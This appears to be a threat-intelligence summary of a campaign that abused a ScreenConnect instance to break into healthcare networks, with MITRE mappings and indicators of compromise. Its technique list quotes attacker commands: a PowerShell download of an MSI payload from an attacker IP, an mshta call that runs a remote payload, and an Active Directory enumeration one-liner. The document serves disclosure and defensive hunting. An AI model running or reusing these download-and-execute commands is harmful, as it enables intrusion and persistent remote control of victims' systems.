Unauthorized access activity in healthcare networks leveraged a locally hosted ScreenConnect remote access tool to gain initial access and maintain persistence, with attackers installing additional remote tools like ScreenConnect and AnyDesk across two endpoints. The campaign involved multiple ScreenConnect instances, PowerShell payloads, targeted endpoint actions, and several IOCs; healthcare organizations should urgently hunt for these indicators and strengthen monitoring. #ScreenConnect #AnyDesk #Outcomes #TransactionDataSystems #Rx30 #ComputerRx
Keypoints
- Attackers abused a locally hosted ScreenConnect instance used by Transaction Data Systems (Outcomes) to access victim healthcare organizations.
- Additional remote access tools (ScreenConnect or AnyDesk) were installed to ensure persistent access across endpoints.
- Four ScreenConnect instances were observed across two endpoints, with one instance used on both endpoints and redacted accounts tied to access.
- PowerShell commands downloaded and executed payloads (test.xml and a.msi), loading a Metasploit Meterpreter in memory and using legitimate services for execution.
- Endpoint 2 saw the creation of an AnyDesk MSI service and a new administrator-level user, followed by further activity with other payloads (s.msi, b.msi) and tool usage.
- IoCs include specific IPs, a domain tied to the vendor, and multiple payload names/hashes such as test.xml and a.msi, plus other related files.
MITRE Techniques
- [T1021] Remote Services – The attackers installed additional remote access tools such as ScreenConnect or AnyDesk to ensure persistent access to the environments. “installing additional remote access tools such as ScreenConnect or AnyDesk instances, to ensure persistent access to the environments.”
- [T1219] Remote Services (External) / [T1133] External Remote Services – The activity relies on a locally hosted ScreenConnect instance used for initial access to victim organizations. “The attackers abused a locally hosted instance of a widely-used remote access tool, ScreenConnect—utilized by the company Transaction Data Systems … for initial access to victim organizations.”
- [T1059.001] PowerShell – The attackers used PowerShell commands to download and execute payloads. “powershell -command & { (New-Object Net.WebClient).DownloadFile(‘http://2.57.149[.]103/a.msi’, ‘C:UsersAdministratorDocumentsa.msi’) }”
- [T1105] Ingress Tool Transfer – The PowerShell commands download payloads from remote servers (a.msi, test.xml). “DownloadFile(…)”
- [T1218.005] Mshta – Execution via mshta to run payloads (e.g., mshta http://119.91.138[.]133:9999/5E1Ch). “mshta http://119.91.138[.]133:9999/5E1Ch”
- [T1543.003] Create or Modify System Process – The installation of AnyDeskMSI Service via MSI and subsequent service manipulation. “installing the “AnyDeskMSI Service””
- [T1136] Create Account – The threat actor attempted to create a new administrator account (“manager”) and add it to the local Admin group. “create the ‘manager’ user account and add the account to the local Administrator group”
- [T1087] Account Discovery / Discovery – The use of Get-ADComputer to enumerate domain computers. “Get-ADComputer -Filter * -Properties * | Sort IPv4Address | FT Name, ipv4*, oper*, LastLogonDate -Autosize”
- [T1046] Network Service Scanning – The presence of Masscan64.exe indicates network port scanning activity. “Masscan64.exe – a compiled version of the Masscan TCP port scanner.”
Indicators of Compromise
- [IP Address] Network Observables – 119.91.138.133, 185.12.45.98, 45.66.230.146, 2.57.149.103
- [Domain] Network Domain – rs.tdsclinical.com
- [File Hash] Test payload – SHA256: 9f42bf3a61faaab8f86abb3c7f9db417bffb3474a55169a4efb1d2386545e4e8 and a.msi – SHA256: 70f865a7f8a01356685b17abdf6ac738e9a9098f1ae2d5a34cfa3610cb28fc56
- [File Name] Payloads – test.xml, a.msi, s.msi, b.msi